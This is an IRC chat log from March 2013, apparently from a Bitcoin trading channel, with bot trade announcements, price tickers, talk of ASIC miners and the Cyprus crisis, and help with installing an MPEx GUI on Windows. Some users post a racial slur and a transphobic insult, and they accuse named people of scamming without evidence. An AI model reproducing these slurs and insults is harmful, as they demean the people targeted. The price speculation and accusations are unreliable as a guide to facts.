"bc,12hprc" is not a valid command. Mar 20 22:26:17 ;;bc,24hprc Mar 20 22:26:19 60.84 Mar 20 22:26:21 hm. Mar 20 22:26:25 benkay: all markets 24h vwap Mar 20 22:26:38 thanks smickles Mar 20 22:26:39 smickles, I have some windows user install instructions Mar 20 22:26:49 documentation's a bit lacking. Mar 20 22:26:53 jborkl: I'd love to have them :) Mar 20 22:26:53 you want me to email it? Mar 20 22:26:59 please Mar 20 22:27:05 ok, np Mar 20 22:28:17 jborkl: btw, i'm working on improving the appearance of the 'long list' sort of things like bids/asks and the overall market view Mar 20 22:28:19 [MPEX] [S.MPOE] 3700 @ 0.00076717 = 2.8385 BTC [+] Mar 20 22:28:53 ok, cool- I just got it working- took a break from yesterday. Mar 20 22:29:06 [BTCTC] [ASICMINER-PT] 10 @ 0.85899 = 8.5899 BTC [-] Mar 20 22:29:09 [BTCTC] [ASICMINER-PT] 2 @ 0.85899 = 1.718 BTC [-] Mar 20 22:33:19 [BTCTC] [B.YABMC] 2 @ 0.0111 = 0.0222 BTC [+] Mar 20 22:34:23 [BTCTC] [ESECURITYSABTC] 1 @ 0.32001 BTC [-] Mar 20 22:35:16 [BTCTC] [SYNERGY] 1 @ 0.00801 BTC [-] Mar 20 22:35:18 [BTCTC] [SYNERGY] 1 @ 0.00801 BTC [-] Mar 20 22:44:12 So is the Fed buying all the Bitcoins up er wot? Mar 20 22:44:42 no its algore Mar 20 22:45:05 I hear he invented Bitcoin. Or was it the internet? Mar 20 22:45:54 It's ah me, Mario! Buying all the BTC at 1 coin = 1 BTC. Mar 20 22:46:30 100 oz giant gold coins I keep collecting everywhere. Mar 20 22:46:33 ph, algore. wait till billg arrives Mar 20 22:46:47 the father of internet, universe and everything Mar 20 22:47:34 [MPEX] [S.MPOE] 3964 @ 0.00076717 = 3.0411 BTC [+] Mar 20 22:48:06 Or is this surge caused by certain Russian "interests" getting their money the heck out of Cyprus? Mar 20 22:49:26 lmao this nick was free! Mar 20 22:49:46 You look taller. Nice suit. Mar 20 22:49:59 Occam's razor... those scenarios... Mar 20 22:50:31 unbalanced Mar 20 22:50:39 you should grab unbalanced_payments Mar 20 22:50:46 and make a bitcoin company with that name Mar 20 22:50:54 confuse the shit out of some people. Mar 20 22:51:06 The simplest explanation is a bunch of newcomers hearing of the price going up wants in. Further raising the price... further attracting newcomers. Mar 20 22:51:21 The higher the price, the more interest there is from the general population. Mar 20 22:51:23 [MPEX] [S.MPOE] 1 @ 0.00076717 BTC [+] Mar 20 22:51:25 [BTCTC] [ASICMINER-PT] 3 @ 0.858989 = 2.577 BTC [-] Mar 20 22:51:31 It's gonna burn all the little guys. Mar 20 22:51:40 Great, bring on the Ponzi headines. Mar 20 22:51:48 Again. Mar 20 22:52:03 Succesful windows buy smickles- adding to the order book and cancel works alsl Mar 20 22:52:05 also Mar 20 22:52:10 Well I'm sure Bitcoin is raising in value, regardless of this exponential price rise. Mar 20 22:52:44 OTOH, if this keeps up for 100 more years, I may eventually be rich. Mar 20 22:52:45 Just that the current price is mostly fueled by speculation. It is my belief. Mar 20 22:53:05 [BTCTC] [ASICMINER-PT] 2 @ 0.858988 = 1.718 BTC [-] Mar 20 22:53:24 ^this is then fueled by what? Mar 20 22:53:24 I'm waiting for the price to go down. Even if it doesn't... well I have a fair amount of BTC even if not much. Mar 20 22:53:29 see nassim taleb about bitcoins? Mar 20 22:53:44 ASICMINER? Mar 20 22:53:47 or al gore? awesome Mar 20 22:53:56 It's fueled by their massive amount of hashing power. Mar 20 22:54:17 hey Namworld ! Mar 20 22:54:24 :) Mar 20 22:54:27 Namworld: I agree, I don't know where it'll be in a year or 5 but I can't see it back at 2.50. Mar 20 22:54:45 yeah, not going to drop at 2.5 again I think... Mar 20 22:54:49 loving btc bond Mar 20 22:54:55 maybe 2.8 Mar 20 22:55:01 But maybe a low of 15 USD/BTC at the low of the crash. Mar 20 22:55:04 Taleb/Gore said something about Bitcoin? Googling... Mar 20 22:55:14 jborkl: nice :) Mar 20 22:55:15 Maybe then go and stabilize around 30 USD/BTC? Mar 20 22:55:18 separately Mar 20 22:55:24 Complete bogus speculation on the price anyway. Mar 20 22:55:28 Thanks MJR Mar 20 22:55:49 I was thinking of slowly buying back tho. Mar 20 22:56:06 At least a part of it. Mar 20 22:56:14 I hedged by investing dollars to lend at bitfinex Mar 20 22:56:24 ;;goxlag Mar 20 22:56:25 0.158895 seconds Mar 20 22:56:54 [BTCTC] [ASICMINER-PT] 1 @ 0.858988 BTC [-] Mar 20 22:58:49 Imagine if price skyrockets to 1k USD a BTC during this which I expect to be a bubble and all BTC-BOND holders want to cash out right away? Would be expensive to buy and complicated to sell assets to cover them. Mar 20 22:58:58 [BTCTC] [GSDPT] 1 @ 0.00444 BTC [-] Mar 20 22:59:11 I've removed ask and will buy back at least a good portion of it. Mar 20 22:59:22 https://bitcointalk.org/index.php?topic=155036.20 is this guy serious? Mar 20 22:59:28 insurance? Mar 20 22:59:54 that site looks like it took upwards of 12 minutes to make Mar 20 23:00:01 Ah, I hit http://www.reddit.com/r/Bitcoin/ and now I'm caught up on Taleb and Gore pumping Bitcoin. Mar 20 23:00:04 [BTCTC] [BTC-BOND] 400 @ 0.0099 = 3.96 BTC [+] Mar 20 23:00:07 [BTCTC] [ASICMINER-PT] 3 @ 0.858989 = 2.577 BTC [+] Mar 20 23:02:22 jborkl: Thanks for the instructions. The only thing is that you shouldn't need pympex to get the MPEx gui to work, otherwise I'd be breaking pympex's license Mar 20 23:04:18 Let me move that , one sec Mar 20 23:05:26 [BTCTC] [S.DICE-PT] 50 @ 0.00399 = 0.1995 BTC [+] Mar 20 23:05:37 ok, remove that from the instructions, you are correct Mar 20 23:07:13 also, I forgot to add- you need to choose to have Kivy open the mpexgui- right click and assign it to always open this file Mar 20 23:08:32 oh windows is so strange to me now Mar 20 23:08:47 bottom fell out on ltc Mar 20 23:11:41 http://www.bloomberg.com/news/2013-03-20/fleeing-the-euro-for-bitcoins-.html sorry of that was already linked Mar 20 23:11:44 if* Mar 20 23:11:57 not the bloomberg one Mar 20 23:12:28 smickles, I just read Cython is included in Kivy for windows- So no need to download that separate Mar 20 23:13:10 benkay: sorry for the delay I was off reading - good idea! Mar 20 23:13:32 ThinkAsThieves: similar to http://www.businessweek.com/articles/2013-03-20/jittery-spaniards-seek-safe-haven-in-bitcoins%23r=rss Mar 20 23:13:36 no apologies necessary, unbalanced. your cycles were probably better burnt on whatever you were reading. Mar 20 23:14:04 LTC on BTC-e.com - Sell orders = Sell orders 902842 LTC, Buy Orders 968BTC Mar 20 23:14:04 on the same topic, a local goldbug just got back from argentina, where he rented a car with bitcoins Mar 20 23:15:03 is a bitcoin bug then Mar 20 23:15:48 [BTCTC] [COGNITIVE] 2 @ 0.24 = 0.48 BTC [-] Mar 20 23:15:51 [BTCTC] [COGNITIVE] 1 @ 0.24995 BTC [+] Mar 20 23:15:53 [BTCTC] [COGNITIVE] 3 @ 0.24997 = 0.7499 BTC [+] Mar 20 23:15:58 Did he say how's their hyperinflation was coming along? Mar 20 23:16:12 er, *how Mar 20 23:16:18 [BTCTC] [COG.F] 1 @ 0.002499 BTC [-] Mar 20 23:16:46 [BTCTC] [COG.F] 2 @ 2.5 = 5 BTC [+] Mar 20 23:18:41 [MPEX] [S.MPOE] 2900 @ 0.00077103 = 2.236 BTC [+] Mar 20 23:19:37 [BTCTC] [ASICMINER-PT] 2 @ 0.858989 = 1.718 BTC [+] Mar 20 23:23:11 [MPEX] [S.MPOE] 1082 @ 0.00077103 = 0.8343 BTC [+] Mar 20 23:23:13 [MPEX] [S.MPOE] 6300 @ 0.00077104 = 4.8576 BTC [+] Mar 20 23:23:19 [MPEX] [S.MPOE] 2318 @ 0.00077128 = 1.7878 BTC [+] Mar 20 23:25:03 jborkl: "uniextractor" is that how it's actually spelled? Mar 20 23:25:28 one sec Mar 20 23:26:45 UniExtract Mar 20 23:27:04 thx :) Mar 20 23:30:21 Namworld: excuse my thickness but how would more hash power (ASICMINER) drive up BTC/USD? It sounds logical but I'm not sure I understand the cause/effect steps Mar 20 23:30:59 Is it because other miners need a higher exchange rate to keep mining, and the network needs the other miners? Mar 20 23:33:27 Overall security of the network increases value Mar 20 23:33:32 imo Mar 20 23:35:01 jborkl: once you have asigned kivy to always open the file, can you launch MPEx just by double clicking MPEx instead of Kivy.bat? Mar 20 23:35:04 But overall security has diminishing returns, doubling the hash rate does not give double the security Mar 20 23:35:28 smickles, yes Mar 20 23:35:32 So more powerful verification mechanisms (ASIC-based miners) improve the utility/value of Bitcoin... right. Mar 20 23:36:35 I agree overall security does not provide hash double and price double Mar 20 23:36:55 I think we are at a unique point reached in January Mar 20 23:36:57 Thousands of Europeans fleeing tax grabs are probably more of a factor I guess. Mar 20 23:37:11 +speculators Mar 20 23:37:34 theres a historical correlation between difficulty and price, its probably a hangover from that Mar 20 23:38:14 http://smpake.com/etc/btc/charts.php Mar 20 23:38:30 theres support and resistance in profitability Mar 20 23:39:34 Interesting! Mar 20 23:40:20 support being around 0.2 and resistance 0.5 or so Mar 20 23:40:23 unbalanced: also check out the charts at http://blockchained.com/ Mar 20 23:40:27 my bet is support will go lower with asic Mar 20 23:40:38 since its getting cheaper to hash Mar 20 23:42:33 Cheaper and easier, less technical know how. Now the main thing is people choosiing a pool that is not going to rip them off... Mar 20 23:43:11 kakobrekla: i hadn't seen those charts of yours before. Would it be tough for you to add a 1 month chart? Mar 20 23:43:11 cheaper to hash? how? with the advent of very expensive asic miners, how are things cheaper? Mar 20 23:43:40 Aic miners are much cheaper Mar 20 23:43:43 Asic Mar 20 23:43:48 on watts/hash? Mar 20 23:43:50 on what metric? Mar 20 23:43:55 all metrics Mar 20 23:43:55 smickles ill take a look later on Mar 20 23:44:00 :) Mar 20 23:44:02 the people with the asics get it cheaper, the gpus will be forced to drop out cause they are less efficient Mar 20 23:44:02 except upfront cost to buy Mar 20 23:44:08 till a equilibrium is reached Mar 20 23:44:14 capital requirements just went *up* friends. Mar 20 23:44:25 is this not correct? Mar 20 23:44:40 does anybody know how long an asic is expected to last? Mar 20 23:44:52 well the new ati is $400 Mar 20 23:45:17 peterl: an excellent unanswered question. Mar 20 23:45:19 so it's not a huge jump from there to a an asic Mar 20 23:45:52 how much is an asic? Mar 20 23:46:00 depends on the company and the size Mar 20 23:46:02 I mean, if you can keep mining on them for years it would lower the capital costs, but if they burn up in a couple months it is a ll a waste Mar 20 23:46:04 i don't play in the space, but i thought they were like 15k Mar 20 23:46:20 no way to know peterl Mar 20 23:46:30 the big rigs are Mar 20 23:46:57 FPGA's didnt burn up and GPUs didnt burn up - the power consumption of a ASIC tells me it will not burn up Mar 20 23:46:59 maybe estimate the price in $ per Mhash? Mar 20 23:47:23 theres only one asic vendor shipping and only just, quality looks average but too soon to know about failure rate Mar 20 23:47:37 i'd just be afraid of buying a rushed product. Mar 20 23:47:53 'testing in production' Mar 20 23:47:57 just because fpgas and gpus don't burn up implies nothing about quality of current bitcoin hashers Mar 20 23:48:02 -> asic hashers Mar 20 23:48:04 they may honor defects, who knows?1 Mar 20 23:48:06 silicon design is non trivial Mar 20 23:48:16 Asic chips are all over, used every day Mar 20 23:48:18 From what I read in the AsicMiner thread it sounded like he used a generous line width, which I think means they will be pretty robust? Mar 20 23:48:31 well 100% of gpus will burn up if deployed wrong Mar 20 23:48:41 +1 to that Mar 20 23:48:41 no doubt Mar 20 23:54:41 [MPEX] [S.MPOE] 132 @ 0.00077128 = 0.1018 BTC [+] Mar 20 23:54:42 [MPEX] [S.MPOE] 2694 @ 0.00077397 = 2.0851 BTC [+] Mar 20 23:55:11 anybody know why ESECURITYSABTC is trading at 2x it's face value? Is it just because of the rapid change in btc price? Mar 20 23:56:50 [BTCTC] [S.DICE-PT] 10 @ 0.004 = 0.04 BTC [+] Mar 20 23:56:55 [BTCTC] [ASICMINER-PT] 1 @ 0.8588 BTC [-] Mar 20 23:57:19 [BTCTC] [S.DICE-PT] 100 @ 0.00399 = 0.399 BTC [-] Mar 20 23:57:45 smickles, have you tried the mpexgui on android yet? Mar 20 23:57:57 [BTCTC] [S.DICE-PT] 300 @ 0.00398 = 1.194 BTC [-] Mar 20 23:58:04 [BTCTC] [ASICMINER-PT] 1 @ 0.8588 BTC [-] Mar 20 23:58:24 [BTCTC] [ASICMINER-PT] 2 @ 0.8588 = 1.7176 BTC [-] Mar 21 00:00:38 jborkl: I have not. Currently, my goals are to improve the look of the long lists, then get all mpex commands into the gui. That said, i've looked at what it takes to deploy a kivy app on android and it seems entirely doable Mar 21 00:01:15 I am trying Kivy launcher on Android, I will let you know how it goes Mar 21 00:01:37 Cool :) Mar 21 00:02:21 unbalanced, what? Mar 21 00:03:15 I thought billg was referring to the [16:53] <@assbot> [BTCTC] [ASICMINER-PT] 2 @ 0.858988 = 1.718 BTC [-] thing Mar 21 00:03:48 I don't see hashing having much of an impact. Mar 21 00:04:22 Ah I was just looking for more info re: your mention of the ASICMINER above Mar 21 00:04:53 jborkl: I put a 'thank you' line into the windows install instructions, is that ok with you? Mar 21 00:05:02 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 21 00:05:32 Yeah, thanks Mar 21 00:05:33 Ah I see it now on the re-read Mar 21 00:07:01 yes i meant asicminer Mar 21 00:12:34 [BTCTC] [ASICMINER-PT] 4 @ 0.8588 = 3.4352 BTC [-] Mar 21 00:12:55 [MPEX] [S.MPOE] 3656 @ 0.00077397 = 2.8296 BTC [+] Mar 21 00:12:57 [MPEX] [S.MPOE] 8544 @ 0.00077505 = 6.622 BTC [+] Mar 21 00:13:54 [HAVELOCK] [HIM] 1 @ 1.99 BTC [+] Mar 21 00:15:49 [MPEX] [S.MPOE] 1 @ 0.00075921 BTC [-] Mar 21 00:16:42 meow Mar 21 00:16:44 ;;ticker Mar 21 00:16:44 BTCUSD ticker | Best bid: 65.20001, Best ask: 65.50000, Bid-ask spread: 0.29999, Last trade: 65.50000, 24 hour volume: 88665.03030319, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 61.61345 Mar 21 00:17:27 http://www.france24.com/en/20130319-internet-europe-bitcoin-digital-currency-getting-boost-from-euro-crisis Mar 21 00:17:31 ehehe Mar 21 00:18:35 mircea_popescu: you missed the one in bloomburg, and the one in businessweek? Mar 21 00:18:47 ;D Mar 21 00:19:02 hehe Mar 21 00:19:24 id like to see a US dollar crisis Mar 21 00:19:29 to shake shit up Mar 21 00:19:31 >:) Mar 21 00:20:00 "worth over 53 dollars" Mar 21 00:20:10 while it is true, I feel the article is outdated Mar 21 00:20:21 a paradigm shift is occuring Mar 21 00:20:34 a shift Mar 21 00:20:39 53 is 35 nao Mar 21 00:21:43 $65 is the new $5 Mar 21 00:22:02 $30 is the new $1 Mar 21 00:25:22 ;;ticker Mar 21 00:25:22 BTCUSD ticker | Best bid: 65.20009, Best ask: 65.49999, Bid-ask spread: 0.29990, Last trade: 65.49999, 24 hour volume: 88714.34219636, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 61.63805 Mar 21 00:25:25 jesus Mar 21 00:25:36 it's gotten to the point i can't sleep cause i miss out Mar 21 00:25:43 lol Mar 21 00:25:56 at first i was like.. yeah bitch imma cash out! Mar 21 00:26:02 then.. im thinking.. Mar 21 00:26:10 hey. in the future, i'll just end up spendingBTC Mar 21 00:26:13 !ticker m s.mpoe Mar 21 00:26:14 [MPEX:S.MPOE] 1D: 0.00070356 / 0.00073898 / 0.00077505 (248006 shares, 183.27 BTC), 7D: 0.00066743 / 0.00071994 / 0.00077505 (2748479 shares, 1,978.76 BTC), 30D: 0.00061614 / 0.00070585 / 0.00078628 (38121639 shares, 26,908.39 BTC) Mar 21 00:26:24 without trading btc for fiat Mar 21 00:26:24 that sounds more like thinking, bowjob ;) Mar 21 00:26:26 ;;calc 0.00073898 * 65.5 Mar 21 00:26:27 0.04840319 Mar 21 00:26:30 awww! soclose! Mar 21 00:26:50 yeap. Mar 21 00:27:01 it doesnt make sense to kill btc for fiat.. fiat will rot Mar 21 00:27:03 >_> Mar 21 00:28:08 [BTCTC] [ASICMINER-PT] 4 @ 0.8588 = 3.4352 BTC [-] Mar 21 00:28:51 https://bitcointalk.org/index.php?topic=137459.msg1642908#msg1642908 oh,usagi is embarrassed Mar 21 00:29:00 being of sound mind and body, i'm converting my fiat as fast as i can, and spending the rest Mar 21 00:29:37 im keeping around ~7k worth of fiat Mar 21 00:29:43 evil jerks trolling usagi Mar 21 00:29:46 some people owe me like 4k fiat Mar 21 00:30:58 usgai/cpa ows me 200btc Mar 21 00:31:02 ;> Mar 21 00:31:20 isnt usagi nefario Mar 21 00:31:27 nah Mar 21 00:31:28 or.. idk, wasn't around for the drama Mar 21 00:31:46 nefario is this chav that figured he's seen some bankers on tv so he's just as good. Mar 21 00:32:01 I missed the pirate boatshow, bruce wagner, ASIC announcement Mar 21 00:32:01 usagi is this white trash that has seen some women so he thinks he's a woman. Mar 21 00:32:02 Bowjob: not at all Mar 21 00:32:04 big difference there. Mar 21 00:32:08 so I came in pretty late in the game Mar 21 00:32:51 [BTCTC] [GSDPT] 1 @ 0.00401 BTC [-] Mar 21 00:33:03 [BTCTC] [GSDPT] 2 @ 0.0039 = 0.0078 BTC [-] Mar 21 00:34:58 I <3 Deprived Mar 21 00:35:09 he's the asset regulator Mar 21 00:35:23 pity he;'s stubbornly sticking to ltc. Mar 21 00:35:32 he might change his tune after today Mar 21 00:35:52 i hope btc goes over 70 so i can claim the first bitcoin corp over 50mn mkt cap Mar 21 00:36:01 :) Mar 21 00:36:17 eh Mar 21 00:36:26 mircea_popescu: "first!" Mar 21 00:36:35 things never change. Mar 21 00:36:52 usagi must be a scammer because DT has endorsed it Mar 21 00:37:06 i imagine the 1st to go over 1bn will make a larger splash anyway. Mar 21 00:37:20 dub funny how that works out huh. that guy just won't learn. Mar 21 00:37:27 DT? A scammer? Mar 21 00:37:49 DT has a gift for detecting scammers Mar 21 00:37:57 by supporting them Mar 21 00:38:40 dub asicminer hasn't blown up so far, that's pretty much his only exception afaik. Mar 21 00:38:45 by detecting you mean associating Mar 21 00:38:54 hes a magnet. Mar 21 00:39:13 all he's doing with AM is a PT, theres still plenty of scope for that to asplode Mar 21 00:39:54 dub nah, he was one of the original supporters Mar 21 00:40:00 back in april last year when the thing was born Mar 21 00:40:18 oh really? Mar 21 00:40:24 who wants to buy some AM! Mar 21 00:40:25 yeah, grep the logs if you're curious Mar 21 00:41:43 basically the usagi threads are like old style russian manuals, and usagi is the delegated evil character which makes all the mistakes so the law abiding engineer guy with a soft love interest can set the record straight explicitly for the benefit of the reader Mar 21 00:43:05 http://polimedia.us/dtng/c/src/136381820671.gif << hungry nigga Mar 21 00:49:03 [BTCTC] [ASICMINER-PT] 6 @ 0.8588 = 5.1528 BTC [-] Mar 21 00:49:32 [BTCTC] [ASICMINER-PT] 4 @ 0.8589 = 3.4356 BTC [+] Mar 21 00:49:53 [BTCTC] [GSDPT] 5 @ 0.0044 = 0.022 BTC [+] Mar 21 00:50:00 is that a trope in russian lit? Mar 21 00:50:09 or were manuals really written like that? Mar 21 00:50:21 pretty much like that yeah Mar 21 00:50:34 also, iono what's in that envelope, but homie's probably about to get hiiiiigh Mar 21 00:51:06 i was gonna go to jail, but then i got high Mar 21 00:51:09 then i got high Mar 21 00:51:15 then i got hiii-iiigh Mar 21 00:51:27 da da dum bum Mar 21 00:51:45 i was going to lock this server down Mar 21 00:51:51 ... Mar 21 00:52:12 i was going to run bitcoind somewhere other than the box running my web app Mar 21 00:52:17 but then i got high Mar 21 00:52:24 i was going to lower the amount in the hot wallet Mar 21 00:52:27 lol Mar 21 00:52:28 but then i got hiiigh Mar 21 00:52:37 stop, it's becoming painfully veracious Mar 21 00:52:51 now bitcointalk's on my ass Mar 21 00:52:56 AND I KNOW WHY-YY Mar 21 00:53:04 everybody Mar 21 00:53:13 because i got high Mar 21 00:53:15 because i got high Mar 21 00:53:17 because i got high. Mar 21 00:54:13 [BTCTC] [PAJKA.BOND] 1 @ 0.104999 BTC [+] Mar 21 00:54:14 https://bitcointalk.org/index.php?topic=155345.msg1647346#msg1647346 Bowjob baby you know about bitbet referral right ? Mar 21 00:57:30 hey midnightmagic : https://bitcointalk.org/index.php?topic=155345.0;all Mar 21 00:57:36 explain about this guy's integrity and everything. Mar 21 00:57:40 i'm all ears. Mar 21 00:58:06 i hope bitbet first referral wins? or if user clicks on other ref url it's replaced? Mar 21 00:58:20 [BTCTC] [ASICMINER-PT] 1 @ 0.8589 BTC [+] Mar 21 00:58:41 not replaced Mar 21 00:58:42 kakobrekla ^ Mar 21 00:58:44 a ok Mar 21 01:05:27 <[\\\]> mircea_popescu: thank you. Mar 21 01:05:44 what's this about ? Mar 21 01:06:04 [\\\] is imsaguy Mar 21 01:06:20 got his G.MPOE :) Mar 21 01:06:21 yea... Mar 21 01:06:25 o. haha. you're welcome Mar 21 01:06:40 <[\\\]> I look forward to my monthly $.27 Mar 21 01:06:43 <[\\\]> ;-) Mar 21 01:06:57 <[\\\]> I think you should raise fees more. Mar 21 01:07:03 <[\\\]> like 60 BTC at least Mar 21 01:07:22 lol! Mar 21 01:07:28 the advantage of having shareholders! Mar 21 01:07:29 ;;slap "[\\\\\\]" Mar 21 01:07:39 <[\\\]> jurov, I see you've learned :) Mar 21 01:07:47 <[\\\]> see, everday is a teaching experience. Mar 21 01:07:54 <[\\\]> everyday* Mar 21 01:07:58 http://i.imgur.com/AiJSjdH.jpg Mar 21 01:08:15 ;;calc .00000097 * 10000 * 65 Mar 21 01:08:16 0.6305 Mar 21 01:08:22 63 not 27 you hater. Mar 21 01:08:50 <[\\\]> oh, right Mar 21 01:09:02 <[\\\]> so if you double, I get >$1.00 Mar 21 01:09:03 <[\\\]> woo Mar 21 01:09:16 lol kakobrekla. women win! Mar 21 01:09:26 [\\\] o ya ?! Mar 21 01:09:40 ;; .63 * 12 / 0.03 Mar 21 01:09:41 Error: ".63" is not a valid command. Mar 21 01:09:44 ;; calc .63 * 12 / 0.03 Mar 21 01:09:45 252 Mar 21 01:09:56 it's the equiv of a 250 dollar T :D Mar 21 01:10:31 [\\\] you ain't ever get anything for free anymore Mar 21 01:11:32 https://bitcointalk.org/index.php?topic=147613.msg1644753#msg1644753 from the butthurt dept. Mar 21 01:11:37 "you are calling me a liar without proof" Mar 21 01:11:48 ya jolly good, proof is needed now. Mar 21 01:12:01 this from the "you are tearing down churches with no proof that god doesn't exist". Mar 21 01:12:05 i totally need proof for that too. Mar 21 01:12:16 [MPEX] [S.MPOE] 6700 @ 0.00077402 = 5.1859 BTC [+] Mar 21 01:14:58 [BTCTC] [ASICMINER-PT] 1 @ 0.8589 BTC [+] Mar 21 01:15:17 [BTCTC] [ASICMINER-PT] 1 @ 0.858989 BTC [+] Mar 21 01:17:21 [BTCTC] [S.MPOE-PT] 51 @ 0.000712 = 0.0363 BTC [-] Mar 21 01:18:59 [BTCTC] [BASIC-MINING] 3 @ 0.34 = 1.02 BTC [+] Mar 21 01:21:11 <[\\\]> jurov, I didn't get anything for free Mar 21 01:21:27 "Is there an affiliate program?" Mar 21 01:21:33 [BTCTC] [BASIC-MINING] 3 @ 0.33319 = 0.9996 BTC [-] Mar 21 01:21:35 <[\\\]> jurov, you must have missed the part where I sold an idea Mar 21 01:21:46 patent troll! Mar 21 01:21:55 <[\\\]> patient troll? Mar 21 01:21:57 <[\\\]> why yes. Mar 21 01:22:05 ;> Mar 21 01:22:14 <[\\\]> paging BFL hardware, table of 1 Mar 21 01:22:22 <[\\\]> oh right, coming soon. Mar 21 01:22:33 [BTCTC] [ASICMINER-PT] 1 @ 0.858989 BTC [+] Mar 21 01:22:35 oh shit our test rig broke Mar 21 01:22:46 <[\\\]> we need a test rig for the test rig damnit! Mar 21 01:22:46 [\\\] expects to be bribed to not ask mp to increase fees Mar 21 01:22:47 which has nothing to do with a mining rig by the way Mar 21 01:23:12 <[\\\]> pigeons: wouldn't throwing the chip on a board and seeing if it hashes be a good way to test it? Mar 21 01:23:23 that kind of ideas Mar 21 01:23:28 <[\\\]> after all, he can have boards printed in like less than 24 hours Mar 21 01:23:33 <[\\\]> or something Mar 21 01:23:37 will it blend? Mar 21 01:23:45 ...er. hash? Mar 21 01:23:52 [\\\]: probably how avalon did it, and why they only had 3 working units after a whole run of components Mar 21 01:24:33 patent troll lol Mar 21 01:24:34 <[\\\]> lol Mar 21 01:24:49 <[\\\]> avalon has other issues Mar 21 01:36:49 so basically here's march and we still don't have an asic maker Mar 21 01:36:51 what the fucking hell. Mar 21 01:37:33 [BTCTC] [ASICMINER-PT] 5 @ 0.858989 = 4.2949 BTC [+] Mar 21 01:38:04 ;;ticker Mar 21 01:38:05 BTCUSD ticker | Best bid: 63.12999, Best ask: 63.13000, Bid-ask spread: 0.00001, Last trade: 63.13000, 24 hour volume: 91479.15178779, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 61.92404 Mar 21 01:38:12 we've reached $66 Mar 21 01:38:16 woo Mar 21 01:38:28 66.6, here we go Mar 21 01:38:39 5 steps forward, 2 steps back Mar 21 01:38:42 im okay with this Mar 21 01:40:07 <[\\\]> mircea_popescu: bfl is an asic maker Mar 21 01:40:12 "Earn Bitcoin at the First Business Opportunity using Bitcoin as primary currency." lolwut? Mar 21 01:40:13 <[\\\]> they just haven't shipped yet Mar 21 01:40:28 [\\\] so when do they ship ? Mar 21 01:40:33 <[\\\]> soon, duh Mar 21 01:40:37 right. Mar 21 01:40:40 "two weeks" Mar 21 01:40:46 <[\\\]> "october" Mar 21 01:40:54 at the latest! Mar 21 01:41:06 <[\\\]> why you gotta be trolling man? Mar 21 01:41:11 <[\\\]> why's everyone hating? Mar 21 01:41:51 <[\\\]> They took the preorders in July.. middle of March.. 8 months later Mar 21 01:41:51 "All users of Bitcoin-Qt/bitcoind versions 0.7.2 and earlier are required to upgrade to 0.8.1..." REQUIRED! Mar 21 01:42:01 <[\\\]> Jesus, might as well make a baby. Mar 21 01:42:04 <[\\\]> its cheaper and quicker Mar 21 01:42:13 and more fun Mar 21 01:42:14 <[\\\]> smickles, yes. db locking is being a bitch. Mar 21 01:42:18 <[\\\]> pizzaman1337: not always. Mar 21 01:42:26 <[\\\]> bishes got horomones. Mar 21 01:42:42 <[\\\]> hormones too Mar 21 01:43:11 anyone here use electrum Mar 21 01:43:12 ? Mar 21 01:44:00 lol, Dooglus has "I am pretty confident we are the new wealthy elite, gentlemen." in his sig now Mar 21 01:44:12 that's been there for a while Mar 21 01:44:29 its been there for a while\ Mar 21 01:44:35 and we are indeed the new wealthy elite Mar 21 01:44:39 http://i.imgur.com/WPhc7Lq.png << see to me, this totally justifies buying more at .0047 Mar 21 01:44:59 o hey, up a little Mar 21 01:45:16 about 3k up Mar 21 01:45:41 Bowjob: i dunno about you, but currently, it'd have to be about 1666666 usd/btc for me to begin considering that Mar 21 01:45:46 ;;asks 67 Mar 21 01:45:49 There are currently 5896.4315 bitcoins offered at or under 67.0 USD, worth 386684.371278 USD in total. | Data vintage: 0.0016 seconds Mar 21 01:45:56 eh Mar 21 01:46:00 how much btc do you have Mar 21 01:46:01 not so bad. Mar 21 01:46:15 hundreds and hundreds of bitcoins :D Mar 21 01:46:16 wtb moar cyprus-like catostrophe Mar 21 01:46:29 i thought everyone here owned 1000s and 1000s of btc Mar 21 01:46:42 catastrophe Mar 21 01:46:45 i might've, but i actually use them Mar 21 01:47:04 workin on my first thousand Mar 21 01:47:13 i'd be closer if i didnt dabble in ltc... Mar 21 01:47:21 and, i sold a fuckload of my s.mpoe when it was at like .00002 or somehting Mar 21 01:47:22 work faster! Mar 21 01:47:37 smickles lolz! Mar 21 01:47:40 well that was just good business sense, smickles... Mar 21 01:47:43 I need to beef my security up Mar 21 01:47:48 it was totally overpriced so. Mar 21 01:48:02 mircea_popescu: i kept a lot too, (and i think i put an extra 0 in there) Mar 21 01:48:08 :p Mar 21 01:48:42 Bowjob: your auth.log not looking so hot? Mar 21 01:48:47 <[\\\]> smickles, decimals are magic.. you can add as many as you want after the decimal Mar 21 01:48:54 i hate those random attempts at root Mar 21 01:48:55 <[\\\]> you could have added like 200 of them Mar 21 01:48:58 huh Mar 21 01:49:00 i dont follow Mar 21 01:49:07 <[\\\]> I sold a ton of s.mpoe at .00020000000000000000000000000000000000000000000000000000000000000000000000000 Mar 21 01:49:09 <[\\\]> rich! Mar 21 01:49:15 lol Mar 21 01:49:29 electrum keeps saying synchronizing Mar 21 01:49:43 <[\\\]> it is having a hard time adding 0 Mar 21 01:51:36 [BTCTC] [B.YABMC] 1 @ 0.01993 BTC [+] Mar 21 01:52:07 [MPEX] [S.MPOE] 328 @ 0.00075921 = 0.249 BTC [-] Mar 21 01:52:09 [MPEX] [S.MPOE] 3000 @ 0.0007592 = 2.2776 BTC [-] Mar 21 01:52:15 [MPEX] [S.MPOE] 2900 @ 0.00075919 = 2.2017 BTC [-] Mar 21 01:52:16 [MPEX] [S.MPOE] 2849 @ 0.00075675 = 2.156 BTC [-] Mar 21 01:53:18 [MPEX] [S.DICE] 1000 @ 0.004999 = 4.999 BTC [-] Mar 21 01:53:21 [MPEX] [S.DICE] 999 @ 0.00499999 = 4.995 BTC [+] Mar 21 01:53:23 [MPEX] [S.DICE] 201 @ 0.005 = 1.005 BTC [+] Mar 21 01:53:24 [MPEX] [S.DICE] 6623 @ 0.0051 = 33.7773 BTC [+] Mar 21 01:53:26 [MPEX] [S.DICE] 26004 @ 0.005598 = 145.5704 BTC [+] Mar 21 01:54:14 fixed it Mar 21 01:58:27 ;;goxlag Mar 21 01:58:28 0.002989 seconds Mar 21 01:58:29 llticker Mar 21 01:58:31 ;;ticker Mar 21 01:58:31 BTCUSD ticker | Best 